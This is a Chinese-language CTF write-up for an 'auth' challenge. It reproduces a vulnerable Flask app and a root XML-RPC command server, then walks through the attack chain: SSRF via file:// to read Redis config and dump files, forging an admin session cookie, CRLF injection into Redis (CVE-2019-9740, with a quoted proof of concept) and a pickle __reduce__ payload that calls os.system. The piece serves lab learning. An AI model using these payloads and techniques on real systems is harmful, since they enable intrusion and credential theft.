爆零了😭8个小时盯一题,非常接近,死于pickle不熟练。
auth
靶机有flask(低权限),里面有redis(有密码)。python有反序列化洞,但是需要通过redis写入序列化数据。里面还有个MCP-Server(root)。思路略复杂,分为两步。
-
通过SSRF读取本地Redis的dump文件,获取flask的secret_key,伪造Session提前到admin(可以触发反序列化)
-
SSRF操作Redis写入序列化数据,触发Pickle反序列化RCE,构造XML-RPC请求mcp,以root权限执行读取flag。
审计
app.py
from flask import Flask, request, jsonify, render_template_string, session, redirect, url_forimport redisimport pickleimport requestsimport base64import osimport ioimport datetimeimport urllib.requestimport urllib.errorimport secretsimport json
app = Flask(__name__, static_folder='static', static_url_path='/static')
def render_page(title, content, username=None, role=None, show_nav=True): """生成带有样式的HTML页面
Args: title: 页面标题 content: 主要内容HTML username: 当前用户名(可选) role: 用户角色(可选) show_nav: 是否显示导航(默认True) """ # 导航菜单 nav_menu = '' if show_nav: if username: nav_menu = f''' <nav> <ul> <li><a href="/home">用户中心</a></li> <li><a href="/profile">个人属性</a></li> '''
if role == 'admin': nav_menu += ''' <li><a href="/admin/online-users">在线用户</a></li> <li><a href="/admin/users">注册用户</a></li> '''
nav_menu += f''' <li><a href="/logout">退出登录</a></li> </ul> </nav> ''' else: nav_menu = ''' <nav> <ul> <li><a href="/login">登录</a></li> <li><a href="/register">注册</a></li> </ul> </nav> '''
# 用户信息显示 user_info = '' if username: user_info = f'<div class="user-info">欢迎, {username}! (角色: {role})</div>'
html = f''' <!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>{title} - auth</title> <link rel="stylesheet" href="/static/style.css"> <link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🔒</text></svg>"> </head> <body> <div class="container"> <header> <h1>{title}</h1> {user_info} </header>
{nav_menu}
<main> {content} </main>
<footer> <p>© 2026 auth | 简约安全设计</p> </footer> </div>
<script src="/static/script.js"></script> </body> </html> ''' return html
class User: def __init__(self, username, password=None): self.username = username self.password = password self.role = "user" self.created_at = "2026-01-20"
def __repr__(self): return f"User(username={self.username!r}, role={self.role!r})"
class OnlineUser: """在线用户类,用于保存登录状态信息""" def __init__(self, username, role="user"): self.username = username self.role = role self.login_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") # 设置失效时间为登录时间后1小时 expiry = datetime.datetime.now() + datetime.timedelta(hours=1) self.expiry_time = expiry.strftime("%Y-%m-%d %H:%M:%S") self.ip_address = request.remote_addr if request else "unknown"
def __repr__(self): return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"
class RestrictedUnpickler(pickle.Unpickler): """限制性的Unpickler,只允许OnlineUser类和安全的内置函数"""
ALLOWED_CLASSES = { '__main__.OnlineUser': OnlineUser, 'builtins': __builtins__ }
def find_class(self, module: str, name: str): full_name = f"{module}.{name}"
# 允许builtins模块的基础类型和安全函数 if module == "builtins" and name in ["getattr", "setattr", "dict", "list", "tuple"]: return getattr(__builtins__, name)
# 白名单检查 if full_name in self.ALLOWED_CLASSES: return self.ALLOWED_CLASSES[full_name]
raise pickle.UnpicklingError(f"Class '{full_name}' is not allowed")
# Redis配置CONFIG_FILE_PATH = '/opt/app_config/redis_config.json'
# 默认配置值REDIS_HOST = 'localhost'REDIS_PORT = 6379REDIS_PASSWORD = '123456'
# 尝试从配置文件读取配置try: if os.path.exists(CONFIG_FILE_PATH): print(f"从配置文件读取Redis配置: {CONFIG_FILE_PATH}") with open(CONFIG_FILE_PATH, 'r') as config_file: config = json.load(config_file)
# 从配置文件获取配置值,如果不存在则使用默认值 REDIS_HOST = config.get('redis_host', REDIS_HOST) REDIS_PORT = config.get('redis_port', REDIS_PORT) REDIS_PASSWORD = config.get('redis_password', REDIS_PASSWORD)
print(f"配置文件读取成功: host={REDIS_HOST}, port={REDIS_PORT}")
try: os.remove(CONFIG_FILE_PATH) print(f"配置文件已删除: {CONFIG_FILE_PATH}") except Exception as delete_error: print(f"警告:无法删除配置文件 {CONFIG_FILE_PATH}: {delete_error}") else: print(f"配置文件不存在: {CONFIG_FILE_PATH},使用默认Redis配置")except Exception as config_error: print(f"配置文件读取失败: {config_error},使用默认Redis配置")
# 连接Redistry: r = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, decode_responses=False) r.ping() print(f"Redis连接成功: {REDIS_HOST}:{REDIS_PORT}")
# 从Redis获取或生成随机secret_key SECRET_KEY_REDIS_KEY = 'app:secret_key' secret_key = r.get(SECRET_KEY_REDIS_KEY) if secret_key is None: # 生成新的随机密钥(64个字符的十六进制字符串) secret_key = secrets.token_hex(32) r.set(SECRET_KEY_REDIS_KEY, secret_key) print(f"已生成新的随机secret_key并保存到Redis: {SECRET_KEY_REDIS_KEY}") else: # Redis返回的是bytes,需要解码为字符串 if isinstance(secret_key, bytes): secret_key = secret_key.decode('utf-8') print(f"从Redis加载现有的secret_key: {SECRET_KEY_REDIS_KEY}")
# 设置Flask应用的secret_key app.secret_key = secret_key print(f"Flask secret_key已设置(长度: {len(secret_key)})")
except Exception as e: print(f"Redis连接失败: {e}") r = None
@app.route('/')def index(): return redirect(url_for('login'))
@app.route('/login', methods=['GET', 'POST'])def login(): if request.method == 'POST': username = request.form.get('username', '') password = request.form.get('password', '')
if not username or not password: return '用户名和密码不能为空'
# 检查用户是否存在 if r is None: return 'Redis连接失败,无法验证用户'
# 从Redis获取用户密码哈希 stored_password = r.hget(f'user:{username}', 'password') if stored_password is None: return '用户不存在或密码错误'
# 简单密码验证 if stored_password.decode('utf-8') != password: return '用户不存在或密码错误'
# 登录成功,设置session session['username'] = username session['logged_in'] = True
# 获取用户角色 role_data = r.hget(f'user:{username}', 'role') role = role_data.decode('utf-8') if role_data else 'user' session['role'] = role
online_user = OnlineUser(username, role) serialized_user = pickle.dumps(online_user) r.set(f'online_user:{username}', serialized_user, ex=3600) # 设置1小时过期
return redirect(url_for('home'))
login_form = ''' <div class="form-container"> <h2>用户登录</h2> <form method="post" class="login-form"> <div class="form-group"> <label for="username">用户名</label> <input type="text" id="username" name="username" required placeholder="请输入用户名"> </div> <div class="form-group"> <label for="password">密码</label> <input type="password" id="password" name="password" required placeholder="请输入密码"> </div> <div class="form-group"> <button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">登录</button> </div> </form> <div class="text-center mt-20"> <p>还没有账号? <a href="/register" class="btn btn-secondary btn-small">注册新账户</a></p> </div> </div> '''
return render_page('登录', login_form, show_nav=False)
# 用户注册@app.route('/register', methods=['GET', 'POST'])def register(): if request.method == 'POST': username = request.form.get('username', '') password = request.form.get('password', '') confirm_password = request.form.get('confirm_password', '') name = request.form.get('name', '') age = request.form.get('age', '') phone = request.form.get('phone', '')
if not username or not password: return '用户名和密码不能为空'
if password != confirm_password: return '两次输入的密码不一致'
if r is None: return 'Redis连接失败,无法注册用户'
# 检查用户是否已存在 if r.hexists(f'user:{username}', 'password'): return '用户名已存在'
user_data = { 'password': password, 'role': 'user', 'created_at': '2026-01-20', 'name': name if name else username, # 如果未提供姓名,默认使用用户名 'age': age if age else '0', 'phone': phone if phone else '未填写', 'avatar': '' # 默认头像为空 }
r.hset(f'user:{username}', mapping=user_data)
success_content = f''' <div class="message message-success"> <h3>注册成功!</h3> <p>用户 <strong>{username}</strong> 已成功注册。</p> <p><a href="/login" class="btn btn-success mt-10">前往登录</a></p> </div> ''' return render_page('注册成功', success_content, show_nav=False)
register_form = ''' <div class="form-container"> <h2>用户注册</h2> <form method="post" class="register-form"> <div class="form-group"> <label for="username">用户名 <span class="required">*</span></label> <input type="text" id="username" name="username" required placeholder="请输入用户名"> </div>
<div class="form-group"> <label for="password">密码 <span class="required">*</span></label> <input type="password" id="password" name="password" required placeholder="请输入密码"> </div>
<div class="form-group"> <label for="confirm_password">确认密码 <span class="required">*</span></label> <input type="password" id="confirm_password" name="confirm_password" required placeholder="请再次输入密码"> </div>
<div class="form-group"> <label for="name">姓名</label> <input type="text" id="name" name="name" placeholder="可选,默认为用户名"> </div>
<div class="form-group"> <label for="age">年龄</label> <input type="number" id="age" name="age" min="0" max="150" placeholder="可选"> </div>
<div class="form-group"> <label for="phone">手机号码</label> <input type="tel" id="phone" name="phone" placeholder="可选"> </div>
<div class="form-group"> <button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">注册</button> </div> </form>
<div class="text-center mt-20"> <p>已有账号? <a href="/login" class="btn btn-secondary btn-small">返回登录</a></p> </div> </div> '''
return render_page('注册', register_form, show_nav=False)
@app.route('/home')def home(): if not session.get('logged_in'): return redirect(url_for('login'))
username = session.get('username', '访客') role = session.get('role', 'user')
admin_link = '' if role == 'admin': admin_link = '<li><a href="/admin/online-users">管理在线用户</a> - 查看所有在线用户信息</li>\n <li><a href="/admin/users">管理注册用户</a> - 查看所有注册用户信息</li>'
main_content = f''' <div class="dashboard"> <div class="welcome-message"> <h2>欢迎回来,{username}!</h2> <p class="role-badge">角色: <span class="badge">{role}</span></p> </div>
<div class="dashboard-cards"> <div class="card"> <h3>个人信息</h3> <p>查看和编辑您的个人资料,包括头像上传</p> <a href="/profile" class="btn btn-success mt-10">管理个人信息</a> </div> '''
if role == 'admin': main_content += ''' <div class="card"> <h3>用户管理</h3> <p>管理系统中的用户</p> <div class="flex flex-column gap-10 mt-10"> <a href="/admin/online-users" class="btn btn-small">在线用户</a> <a href="/admin/users" class="btn btn-small">注册用户</a> </div> </div> '''
main_content += ''' </div>
<div class="quick-actions mt-30"> <h3>快速操作</h3> <div class="flex gap-10"> <a href="/logout" class="btn btn-danger">退出登录</a> </div> </div> </div> '''
return render_page('用户中心', main_content, username, role)
@app.route('/admin/online-users')def admin_online_users(): if not session.get('logged_in'): return redirect(url_for('login'))
if session.get('role') != 'admin': return '权限不足,需要管理员权限'
if r is None: return 'Redis连接失败'
# 获取所有在线用户键 online_keys = r.keys('online_user:*')
if not online_keys: return '没有在线用户'
users_html = '<h1>在线用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">' users_html += '<tr><th>用户名</th><th>角色</th><th>登录时间</th><th>失效时间</th><th>IP地址</th><th>状态</th></tr>'
for key in online_keys: try: serialized = r.get(key) if serialized: file = io.BytesIO(serialized) unpickler = RestrictedUnpickler(file) online_user = unpickler.load()
expiry_time = datetime.datetime.strptime(online_user.expiry_time, "%Y-%m-%d %H:%M:%S") current_time = datetime.datetime.now() status = '在线' if current_time < expiry_time else '已过期'
users_html += f''' <tr> <td>{online_user.username}</td> <td>{online_user.role}</td> <td>{online_user.login_time}</td> <td>{online_user.expiry_time}</td> <td>{online_user.ip_address}</td> <td style="color: {'green' if status == '在线' else 'red'}">{status}</td> </tr> ''' except Exception as e: users_html += f'<tr><td colspan="6">反序列化错误: {e}</td></tr>'
users_html += '</table>'
# 获取当前用户信息用于render_page current_username = session.get('username', '') current_role = session.get('role', '')
users_html += ''' <div class="admin-actions mt-30"> <a href="/admin/users" class="btn btn-secondary">查看注册用户</a> <a href="/home" class="btn">返回用户中心</a> </div> '''
return render_page('在线用户管理', users_html, current_username, current_role)
@app.route('/admin/users')def admin_users(): if not session.get('logged_in'): return redirect(url_for('login'))
if session.get('role') != 'admin': return '权限不足,需要管理员权限'
if r is None: return 'Redis连接失败'
# 获取所有用户键 user_keys = r.keys('user:*')
if not user_keys: return '没有注册用户'
users_html = '<h1>注册用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">' users_html += '<tr><th>用户名</th><th>角色</th><th>姓名</th><th>年龄</th><th>手机号码</th><th>创建时间</th></tr>'
for key in user_keys: try: user_data = r.hgetall(key) if user_data: user_info = {} for field, value in user_data.items(): field_str = field.decode('utf-8') if isinstance(field, bytes) else field value_str = value.decode('utf-8') if isinstance(value, bytes) else value user_info[field_str] = value_str
username = key.decode('utf-8').replace('user:', '') if isinstance(key, bytes) else key.replace('user:', '') role = user_info.get('role', 'user') name = user_info.get('name', username) age = user_info.get('age', '0') phone = user_info.get('phone', '未填写') created_at = user_info.get('created_at', '未知')
users_html += f''' <tr> <td>{username}</td> <td>{role}</td> <td>{name}</td> <td>{age}</td> <td>{phone}</td> <td>{created_at}</td> </tr> ''' except Exception as e: users_html += f'<tr><td colspan="6">获取用户信息错误: {e}</td></tr>'
users_html += '</table>'
current_username = session.get('username', '') current_role = session.get('role', '')
users_html += ''' <div class="admin-actions mt-30"> <a href="/admin/online-users" class="btn btn-secondary">查看在线用户</a> <a href="/home" class="btn">返回用户中心</a> </div> '''
return render_page('注册用户管理', users_html, current_username, current_role)
@app.route('/profile')def profile(): if not session.get('logged_in'): return redirect(url_for('login'))
username = session.get('username', '') if not username or r is None: return '无法获取用户信息'
# 从Redis获取用户信息 user_data = r.hgetall(f'user:{username}') if not user_data: return '用户信息不存在'
user_info = {} for key, value in user_data.items(): user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \ value.decode('utf-8') if isinstance(value, bytes) else value
name = user_info.get('name', username) age = user_info.get('age', '0') phone = user_info.get('phone', '未填写') avatar = user_info.get('avatar', '') role = user_info.get('role', 'user') created_at = user_info.get('created_at', '未知')
# 判断头像类型:URL或本地文件 if avatar.startswith('http://') or avatar.startswith('https://'): avatar_src = avatar else: avatar_src = ''
# 构建个人资料内容 profile_content = f''' <div class="profile-container"> <div class="profile-header"> <h2>个人资料</h2> <p>查看和管理您的个人信息</p> </div>
<div class="profile-content"> <div class="profile-avatar-section"> <div class="avatar-preview"> <img src="{avatar_src}" alt="用户头像" id="profile-avatar"> </div> <div class="avatar-actions"> <a href="/profile/avatar" class="btn btn-success">更换头像</a> </div> </div>
<div class="profile-info-section"> <h3>基本信息</h3> <table class="profile-info-table"> <tr> <th>用户名</th> <td>{username}</td> </tr> <tr> <th>姓名</th> <td>{name}</td> </tr> <tr> <th>年龄</th> <td>{age}</td> </tr> <tr> <th>手机号码</th> <td>{phone}</td> </tr> <tr> <th>角色</th> <td><span class="badge">{role}</span></td> </tr> <tr> <th>注册时间</th> <td>{created_at}</td> </tr> </table>
<div class="profile-actions mt-30"> <a href="/profile/edit" class="btn btn-success">编辑个人资料</a> <a href="/home" class="btn btn-secondary">返回用户中心</a> </div> </div> </div> </div> '''
return render_page('个人属性', profile_content, username, role)
# 编辑个人属性@app.route('/profile/edit', methods=['GET', 'POST'])def edit_profile(): if not session.get('logged_in'): return redirect(url_for('login'))
username = session.get('username', '') if not username or r is None: return '无法获取用户信息'
if request.method == 'POST': # 获取表单数据 name = request.form.get('name', '') age = request.form.get('age', '') phone = request.form.get('phone', '')
# 验证年龄是否为数字 if age and not age.isdigit(): return '年龄必须是数字'
# 获取当前用户信息 current_data = r.hgetall(f'user:{username}') if not current_data: return '用户信息不存在'
# 更新用户信息(保留密码和角色等字段) updates = {} if name: updates['name'] = name if age: updates['age'] = age if phone: updates['phone'] = phone
# 只更新有变化的字段 if updates: r.hset(f'user:{username}', mapping=updates)
return redirect(url_for('profile'))
# GET请求,显示编辑表单 # 获取当前用户信息 user_data = r.hgetall(f'user:{username}') if not user_data: return '用户信息不存在'
# 解码字节数据为字符串 user_info = {} for key, value in user_data.items(): user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \ value.decode('utf-8') if isinstance(value, bytes) else value
# 获取当前值 current_name = user_info.get('name', username) current_age = user_info.get('age', '0') current_phone = user_info.get('phone', '未填写')
# 构建编辑表单 edit_form = f''' <div class="form-container"> <h2>编辑个人资料</h2> <p>更新您的个人信息</p>
<form method="post" class="edit-form"> <div class="form-group"> <label for="name">姓名</label> <input type="text" id="name" name="name" value="{current_name}" placeholder="请输入您的姓名"> </div>
<div class="form-group"> <label for="age">年龄</label> <input type="number" id="age" name="age" value="{current_age}" min="0" max="150" placeholder="请输入您的年龄"> </div>
<div class="form-group"> <label for="phone">手机号码</label> <input type="tel" id="phone" name="phone" value="{current_phone}" placeholder="请输入您的手机号码"> </div>
<div class="form-group"> <button type="submit" class="btn btn-success">保存修改</button> <a href="/profile" class="btn btn-secondary" style="margin-left: 15px;">取消</a> </div> </form>
<div class="additional-actions mt-30"> <h3>其他操作</h3> <div class="flex gap-10"> <a href="/profile/avatar" class="btn btn-small">更换头像</a> <a href="/profile" class="btn btn-small">返回个人资料</a> <a href="/home" class="btn btn-small">返回用户中心</a> </div> </div> </div> '''
return render_page('编辑个人属性', edit_form, username, session.get('role', 'user'))
# 退出登录@app.route('/logout')def logout(): session.clear() return redirect(url_for('login'))
# 用户头像上传@app.route('/profile/avatar', methods=['GET', 'POST'])def upload_avatar(): # 检查用户是否登录 if not session.get('logged_in'): return redirect(url_for('login'))
username = session.get('username', '') if not username or r is None: return '无法获取用户信息'
if request.method == 'GET': # 显示上传表单 upload_form = f''' <div class="upload-container"> <h2>上传头像</h2> <div class="user-info mb-20"> <p><strong>当前用户:</strong> {username}</p> </div>
<div class="upload-options"> <div class="upload-option"> <h3>方式一:上传图片文件</h3> <div class="upload-form-card"> <form method="post" enctype="multipart/form-data" class="upload-form"> <div class="form-group"> <label for="avatar_file">选择图片文件</label> <input type="file" id="avatar_file" name="avatar_file" accept="image/*" class="file-input"> <p class="help-text">支持 JPG, PNG, GIF 等图片格式</p> </div> <div class="form-group"> <button type="submit" name="upload_type" value="上传文件" class="btn btn-success">上传文件</button> </div> </form> </div> </div>
<div class="upload-option"> <h3>方式二:提供图片URL</h3> <div class="upload-form-card"> <form method="post" class="upload-form"> <div class="form-group"> <label for="avatar_url">图片URL地址</label> <input type="text" id="avatar_url" name="avatar_url" placeholder="请输入图片URL地址" class="url-input"> <p class="help-text">请输入有效的图片URL地址</p> </div> <div class="form-group"> <button type="submit" name="upload_type" value="从URL下载" class="btn btn-success">从URL下载</button> </div> </form> </div> </div> </div>
<div class="upload-note mt-30"> <div class="message"> <p><strong>注意:</strong>上传的头像将显示在您的个人资料中。</p> </div> </div>
<div class="upload-actions mt-30"> <a href="/profile" class="btn btn-secondary">返回个人属性</a> </div> </div> '''
return render_page('上传头像', upload_form, username, session.get('role', 'user'))
# POST请求处理 upload_type = request.form.get('upload_type')
if upload_type == '上传文件': # 处理文件上传 if 'avatar_file' not in request.files: return '请选择要上传的文件'
file = request.files['avatar_file'] if file.filename == '': return '请选择有效的文件'
# 检查文件类型 if file.content_type and not file.content_type.startswith('image/'): return '只能上传图片文件'
return '功能尚未开发'
elif upload_type == '从URL下载': url = request.form.get('avatar_url', '') if not url: return '请提供图片URL'
try: # 使用urllib处理URL请求 import urllib.parse
# 解析URL获取主机和端口信息 parsed = urllib.parse.urlparse(url) host = parsed.hostname port = parsed.port or (80 if parsed.scheme == 'http' else 443 if parsed.scheme == 'https' else None)
# 使用urllib.request.urlopen发送请求 req = urllib.request.Request(url)
# 发送请求并获取响应 response = urllib.request.urlopen(req, timeout=10) response_data = response.read() content_type = response.headers.get('Content-Type', '') status_code = response.getcode()
r.hset(f'user:{username}', 'avatar', url) data_size = len(response_data)
base64_data = base64.b64encode(response_data).decode('utf-8')
# 创建base64图片数据URI # 如果content_type为空或无效,使用默认的image/png display_content_type = content_type if content_type else 'image/png' data_uri = f'data:{display_content_type};base64,{base64_data}'
# 统一显示结果,使用img标签展示base64编码的图片数据 unified_content = f''' <div class="message"> <h2>图片预览</h2>
<div class="image-preview-container mt-20"> <div class="image-wrapper"> <img src="{data_uri}" alt="加载图片图片" style="max-width: 100%; max-height: 500px; border: 1px solid #ddd; border-radius: 4px;"> </div> </div>
<div class="preview-actions mt-30"> <a href="/profile" class="btn btn-success">查看个人属性</a> <a href="/profile/avatar" class="btn btn-secondary">继续上传</a> </div> </div> '''
return render_page('图片预览', unified_content, username, session.get('role', 'user'))
except Exception as e: error_content = f''' <div class="message message-error"> <h2>处理失败</h2> <div class="error-details"> <p><strong>错误信息:</strong> {e}</p> </div> <div class="error-actions mt-20"> <a href="/profile/avatar" class="btn btn-secondary">返回上传页面</a> </div> </div> '''
return render_page('处理失败', error_content, username, session.get('role', 'user'))
else: return '无效的上传类型'
if __name__ == '__main__': app.run(host='0.0.0.0', port=5000, debug=False)读取file:///etc/redis/redis.conf获取真实的Redis密码redispass123(没错,源码写死的那个是假的。。)
多注册、登录、登出,触发Redis dump(大概要满足redis操作大于一定值且没10分钟左右检测一次)。读取file:///var/lib/redis/dump.rdb可以获取明文的flask secret_key,伪造session拿到admin权限。
# app:secret_key@@e862df6072f59a75ee66fff76e2be0af4166ac929a805e39993061d6d18223e3
python flask_session_cookie_manager3.py encode -s '88ff640dd01faab118a11f5610a15f64285e2ca45adda81c46a1dbdedf4b2a4b' -t "{'logged_in':True,'role':'admin','username':'admin'}"遍历file:///proc/[pid]/cmdline找到MCP服务器源码(文件名随机): mcp_server_secure_[hash].py
#!/usr/bin/env python3import sysimport osimport subprocessimport jsonimport platformimport threadingimport timeimport functoolsfrom xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandlerfrom xmlrpc.server import SimpleXMLRPCDispatcherimport logging
# 设置日志logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')logger = logging.getLogger('MCP-Secure-Server')
class RequestHandler(SimpleXMLRPCRequestHandler): rpc_paths = ('/RPC2',)
class SecureXMLRPCServer(SimpleXMLRPCServer):
def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._introspection_enabled = False
def system_listMethods(self): from xmlrpc.client import Fault raise Fault(403, "Authentication failed")
def system_methodSignature(self, method_name): from xmlrpc.client import Fault raise Fault(403, "Authentication failed")
def system_methodHelp(self, method_name): from xmlrpc.client import Fault raise Fault(403, "Authentication failed")
def _dispatch(self, method, params): if method.startswith('system.'): from xmlrpc.client import Fault raise Fault(403, "Authentication failed")
try: return super()._dispatch(method, params) except Fault as e: raise Fault(403, "Authentication failed") except Exception: raise
class MCPServerSecure:
def __init__(self, host='0.0.0.0', port=54321): self.host = host self.port = port self.server = SecureXMLRPCServer((host, port), requestHandler=RequestHandler, allow_none=True, logRequests=False)
self.auth_token = "mcp_secure_token_b2rglxd"
self.register_methods()
logger.info(f"安全MCP服务器初始化完成,监听 {host}:{port}") logger.info(f"认证令牌: {self.auth_token}") logger.info(f"服务启动完成,进程ID: {os.getpid()}")
def verify_token(self, token): """验证令牌""" return token == self.auth_token
def _auth_required(self, func): """认证装饰器""" @functools.wraps(func) def wrapper(token, *args, **kwargs): if not self.verify_token(token): return {'error': 'Authentication failed. Invalid token.'} return func(*args, **kwargs) return wrapper
def register_methods(self): """注册所有需要认证的RPC方法""" # 所有方法都要求token作为第一个参数 self.server.register_function( self._auth_required(self.get_server_info), 'get_server_info' ) self.server.register_function( self._auth_required(self.get_system_status), 'get_system_status' ) self.server.register_function( self._auth_required(self.list_files), 'list_files' ) self.server.register_function( self._auth_required(self.read_file), 'read_file' ) self.server.register_function( self._auth_required(self.execute_command), 'execute_command' ) self.server.register_function( self._auth_required(self.get_process_list), 'get_process_list' ) self.server.register_function( self._auth_required(self.service_control), 'service_control' )
# ========== MCP 服务方法 ========== def get_server_info(self): """获取MCP服务器信息""" return { 'service': 'Secure Management Control Protocol Server', 'version': '2.0.0', 'host': self.host, 'port': self.port, 'elevated_privileges': os.geteuid() == 0, 'pid': os.getpid(), 'secure': True, 'auth_required': 'ALL_METHODS' }
def get_system_status(self): """获取系统状态信息""" try: # CPU使用率 with open('/proc/loadavg', 'r') as f: loadavg = f.read().strip()
# 内存信息 mem_info = {} with open('/proc/meminfo', 'r') as f: for line in f: if 'MemTotal' in line or 'MemFree' in line or 'MemAvailable' in line: key, value = line.split(':') mem_info[key.strip()] = value.strip()
# 磁盘空间 disk_info = {} try: df_output = subprocess.check_output(['df', '-h', '/'], stderr=subprocess.DEVNULL, text=True) lines = df_output.strip().split('\n') if len(lines) > 1: parts = lines[1].split() if len(parts) >= 6: disk_info = { 'filesystem': parts[0], 'size': parts[1], 'used': parts[2], 'available': parts[3], 'use_percent': parts[4], 'mounted': parts[5] } except: disk_info = {'error': 'Unable to get disk info'}
return { 'system': platform.system(), 'node': platform.node(), 'release': platform.release(), 'version': platform.version(), 'machine': platform.machine(), 'processor': platform.processor(), 'load_average': loadavg, 'memory': mem_info, 'disk': disk_info, 'uptime': self._get_uptime(), 'time': time.strftime('%Y-%m-%d %H:%M:%S') } except Exception as e: return {'error': str(e)}
def _get_uptime(self): """获取系统运行时间""" try: with open('/proc/uptime', 'r') as f: uptime_seconds = float(f.readline().split()[0]) days = int(uptime_seconds // 86400) hours = int((uptime_seconds % 86400) // 3600) minutes = int((uptime_seconds % 3600) // 60) return f"{days}d {hours}h {minutes}m" except: return "Unknown"
def list_files(self, path='.'): """列出指定目录下的文件和目录""" try: if '..' in path or path.startswith('/'): sensitive_dirs = ['/etc', '/root', '/home', '/var'] for sensitive in sensitive_dirs: if path.startswith(sensitive) and not path.startswith('/opt/mcp_service'): return {'error': 'Access to sensitive directory restricted'}
files = [] for item in os.listdir(path): item_path = os.path.join(path, item) stat = os.stat(item_path) files.append({ 'name': item, 'path': item_path, 'is_dir': os.path.isdir(item_path), 'size': stat.st_size, 'modified': time.ctime(stat.st_mtime), 'permissions': oct(stat.st_mode)[-3:] }) return {'path': path, 'files': files} except Exception as e: return {'error': str(e)}
def read_file(self, filepath): """读取文件内容""" try: if '..' in filepath or filepath.startswith('/etc/passwd') or 'flag' in filepath: return {'error': 'Access to sensitive file restricted'}
with open(filepath, 'r', encoding='utf-8', errors='ignore') as f: content = f.read(5000) # 限制读取大小 return { 'file': filepath, 'content': content, 'truncated': len(content) == 5000 } except Exception as e: return {'error': str(e)}
def execute_command(self, command): """执行系统命令""" try: logger.warning(f"执行命令: {command}")
result = subprocess.run( command, shell=True, capture_output=True, text=True, timeout=10 )
return { 'command': command, 'returncode': result.returncode, 'stdout': result.stdout, 'stderr': result.stderr, 'success': result.returncode == 0 } except subprocess.TimeoutExpired: return {'error': 'Command execution timeout'} except Exception as e: return {'error': str(e)}
def get_process_list(self): """获取进程列表""" try: processes = [] # 使用ps命令获取进程信息 ps_output = subprocess.check_output( ['ps', 'aux'], stderr=subprocess.DEVNULL, text=True )
lines = ps_output.strip().split('\n') if len(lines) > 1: header = lines[0] for line in lines[1:21]: # 限制返回前20个进程 parts = line.split() if len(parts) >= 11: process = { 'user': parts[0], 'pid': parts[1], 'cpu': parts[2], 'mem': parts[3], 'vsz': parts[4], 'rss': parts[5], 'tty': parts[6], 'stat': parts[7], 'start': parts[8], 'time': parts[9], 'command': ' '.join(parts[10:]) } processes.append(process)
return {'process_count': len(processes), 'processes': processes} except Exception as e: return {'error': str(e)}
def service_control(self, service_name, action): """控制系统服务(start/stop/restart/status)""" try: if action not in ['start', 'stop', 'restart', 'status']: return {'error': 'Invalid action. Use start/stop/restart/status'}
result = subprocess.run( ['systemctl', action, service_name], capture_output=True, text=True, timeout=10 )
return { 'service': service_name, 'action': action, 'returncode': result.returncode, 'stdout': result.stdout, 'stderr': result.stderr } except FileNotFoundError: return {'error': 'systemctl not available'} except Exception as e: return {'error': str(e)}
def run(self): """运行MCP服务器""" logger.info(f"启动安全MCP服务器,监听 {self.host}:{self.port}") logger.info("所有方法需要认证令牌") try: self.server.serve_forever() except KeyboardInterrupt: logger.info("收到中断信号,关闭服务器") finally: self.server.server_close() logger.info("MCP服务器已关闭")
def main(): """主函数""" # 检查运行权限 if os.geteuid() != 0: logger.warning("警告:服务未以管理员权限运行,部分功能可能受限") logger.warning("建议以管理员权限运行以获得完整功能")
# 创建并运行服务器 server = MCPServerSecure(host='0.0.0.0', port=54321) server.run()
if __name__ == '__main__': main()SSRF
搜索发现这个版本的urllib存在CRLF,CVE-2019-9740,贴个GitHub Issue链接
贴上原文:Attack Scenarios
- By crafting HTTP headers, it’s possible to fool some web services;
- It’s also possible to attack several simple services like Redis, memcached.
Let’s take Redis as a example here:
Adapt the script above to this:
#!/usr/bin/env python3import sysimport urllibimport urllib.errorimport urllib.request
host = "10.251.0.83:6379?\r\nSET test success\r\n"url = "http://" + host + ":8080/test/?test=a"try:info = urllib.request.urlopen(url).info()print(info)except urllib.error.URLError as e:print(e)#endWe changed the injected header to a valid redis command, after executing this, we check the redis server:
127.0.0.1:6379> GET test"success"127.0.0.1:6379>We can see that a “test” key was inserted successfully.
嗯就是这个原理,但是折腾仔细这些个\r\n真的真的非常折磨。
Pickle
急了急了,没时间了当然急了。题目有限制,所以需要从OnlineUser出发,真的很基础,但当时已经静不下去思考了()
OnlineUser.__init__.__globals__["os"].system("ls")赛后复现就很简单。接着去请求MCP就好了。
import os, pickle,datetimefrom flask import requestclass OnlineUser: """在线用户类,用于保存登录状态信息""" def __init__(self, username, role="user"): self.username = username self.role = role self.login_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") # 设置失效时间为登录时间后1小时 expiry = datetime.datetime.now() + datetime.timedelta(hours=1) self.expiry_time = expiry.strftime("%Y-%m-%d %H:%M:%S") self.ip_address = request.remote_addr if request else "unknown"
def __repr__(self): return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"
def __reduce__(self): return (OnlineUser.__init__.__globals__["os"].system, ("say 你妈",))
if __name__ == "__main__": payload = pickle.dumps(OnlineUser("aaa"), protocol=0) print(payload) # b'cposix\nsystem\np0\n(Vsay \\u4f60\\u5988\np1\ntp2\nRp3\n.' pickle.loads(payload)后纪
傻逼平台,时间一到就关靶机,坚持到最后一分钟早就不是为了flag而做了(因为大概也出不了了)。结果一刷新说是靶机没了?非常糟糕的体验,浪费了很多时间,花费的时间和学到的知识没成正比。
如果这篇文章对你有帮助,欢迎分享给更多人!
部分信息可能已经过时









